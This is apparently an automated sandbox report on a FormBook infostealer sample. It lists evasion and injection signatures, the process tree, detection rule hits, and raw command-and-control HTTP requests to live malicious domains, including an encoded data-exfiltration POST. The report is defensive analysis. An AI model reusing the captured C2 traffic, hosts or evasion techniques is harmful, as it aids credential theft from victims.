Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4sfN3Gx1vO.exe

Overview

General Information

Sample name:4sfN3Gx1vO.exe
renamed because original name is a hash value
Original sample name:e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a.exe
Analysis ID:1587791
MD5:f6f040a290cc9c41a1b07307f12310e5
SHA1:c34b80ea358bbddc007a7e9054f9d71eee00799f
SHA256:e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4sfN3Gx1vO.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\4sfN3Gx1vO.exe" MD5: F6F040A290CC9C41A1B07307F12310E5)
    • svchost.exe (PID: 1848 cmdline: "C:\Users\user\Desktop\4sfN3Gx1vO.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YZKoIsKkwLJWPq.exe (PID: 368 cmdline: "C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • prevhost.exe (PID: 7060 cmdline: "C:\Windows\SysWOW64\prevhost.exe" MD5: 79FED29A7F3DF4BA67599EFF3CDB4F1A)
          • YZKoIsKkwLJWPq.exe (PID: 2764 cmdline: "C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6520 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.24e0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.24e0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ParentImage: C:\Users\user\Desktop\4sfN3Gx1vO.exe, ParentProcessId: 4836, ParentProcessName: 4sfN3Gx1vO.exe, ProcessCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ProcessId: 1848, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ParentImage: C:\Users\user\Desktop\4sfN3Gx1vO.exe, ParentProcessId: 4836, ParentProcessName: 4sfN3Gx1vO.exe, ProcessCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ProcessId: 1848, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T18:03:35.763872+010028554651A Network Trojan was detected192.168.2.549990104.21.64.180TCP
                2025-01-10T18:04:26.663076+010028554651A Network Trojan was detected192.168.2.549892161.97.142.14480TCP
                2025-01-10T18:04:50.155662+010028554651A Network Trojan was detected192.168.2.549982172.96.187.6080TCP
                2025-01-10T18:05:04.117065+010028554651A Network Trojan was detected192.168.2.549986185.199.108.15380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T18:04:42.525231+010028554641A Network Trojan was detected192.168.2.549979172.96.187.6080TCP
                2025-01-10T18:04:45.239495+010028554641A Network Trojan was detected192.168.2.549980172.96.187.6080TCP
                2025-01-10T18:04:47.653195+010028554641A Network Trojan was detected192.168.2.549981172.96.187.6080TCP
                2025-01-10T18:04:56.451357+010028554641A Network Trojan was detected192.168.2.549983185.199.108.15380TCP
                2025-01-10T18:04:58.992300+010028554641A Network Trojan was detected192.168.2.549984185.199.108.15380TCP
                2025-01-10T18:05:01.557997+010028554641A Network Trojan was detected192.168.2.549985185.199.108.15380TCP
                2025-01-10T18:05:10.670177+010028554641A Network Trojan was detected192.168.2.549987104.21.64.180TCP
                2025-01-10T18:05:13.233018+010028554641A Network Trojan was detected192.168.2.549988104.21.64.180TCP
                2025-01-10T18:05:15.795444+010028554641A Network Trojan was detected192.168.2.549989104.21.64.180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 4sfN3Gx1vO.exeVirustotal: Detection: 72%Perma Link
                Source: 4sfN3Gx1vO.exeReversingLabs: Detection: 76%
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 4sfN3Gx1vO.exeJoe Sandbox ML: detected
                Source: 4sfN3Gx1vO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: prevhost.pdb source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2318966272.000000000070E000.00000002.00000001.01000000.00000005.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000000.2464236823.000000000070E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: prevhost.pdbGCTL source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0057DBBE
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0054C2A2 FindFirstFileExW,0_2_0054C2A2
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005868EE FindFirstFileW,FindClose,0_2_005868EE
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0058698F
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D076
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D3A9
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00589642
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0058979D
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00589B2B
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00585C97
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6C7C0 FindFirstFileW,FindNextFileW,FindClose,5_2_02F6C7C0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 4x nop then xor eax, eax5_2_02F59F20
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 4x nop then mov ebx, 00000004h5_2_04F504DE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49892 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 172.96.187.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49982 -> 172.96.187.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 172.96.187.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 172.96.187.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 104.21.64.1:80
                Source: DNS query: www.030002513.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 172.96.187.60 172.96.187.60
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0058CE44
                Source: global trafficHTTP traffic detected: GET /95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug== HTTP/1.1Host: www.030002513.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn HTTP/1.1Host: www.mbakjisoo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn HTTP/1.1Host: www.vilakodsiy.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.030002513.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mbakjisoo.site
                Source: global trafficDNS traffic detected: DNS query: www.pku-cs-cjw.top
                Source: global trafficDNS traffic detected: DNS query: www.vilakodsiy.sbs
                Source: unknownHTTP traffic detected: POST /s7cs/ HTTP/1.1Host: www.mbakjisoo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.mbakjisoo.siteContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 204Referer: http://www.mbakjisoo.site/s7cs/User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 55 79 6f 52 4c 33 7a 72 69 6c 4e 2f 37 46 35 57 58 48 55 50 53 62 6e 75 33 57 33 43 74 36 73 39 39 6c 63 4d 48 76 39 32 6d 76 4a 2b 2f 41 77 46 70 55 67 2f 32 65 4e 52 51 4e 32 45 4f 6a 73 61 4c 75 78 5a 74 76 2f 75 65 4d 42 38 6d 43 6e 47 2f 64 59 79 6d 2b 67 47 5a 67 55 31 7a 54 47 33 7a 68 6e 52 42 4f 57 56 55 50 2f 76 68 63 47 57 4b 59 4c 73 61 68 32 50 73 62 4a 4c 49 2f 72 73 49 78 38 78 45 39 44 52 53 7a 34 51 68 51 32 68 5a 65 34 59 67 4d 6f 5a 73 6e 71 50 44 53 6c 48 4c 73 62 38 46 64 74 76 4a 72 78 42 73 6e 36 66 2f 5a 42 4d 6c 32 36 35 57 6e 51 3d Data Ascii: gjR=aDmdZf0q1uw1UyoRL3zrilN/7F5WXHUPSbnu3W3Ct6s99lcMHv92mvJ+/AwFpUg/2eNRQN2EOjsaLuxZtv/ueMB8mCnG/dYym+gGZgU1zTG3zhnRBOWVUP/vhcGWKYLsah2PsbJLI/rsIx8xE9DRSz4QhQ2hZe4YgMoZsnqPDSlHLsb8FdtvJrxBsn6f/ZBMl265WnQ=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:04:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
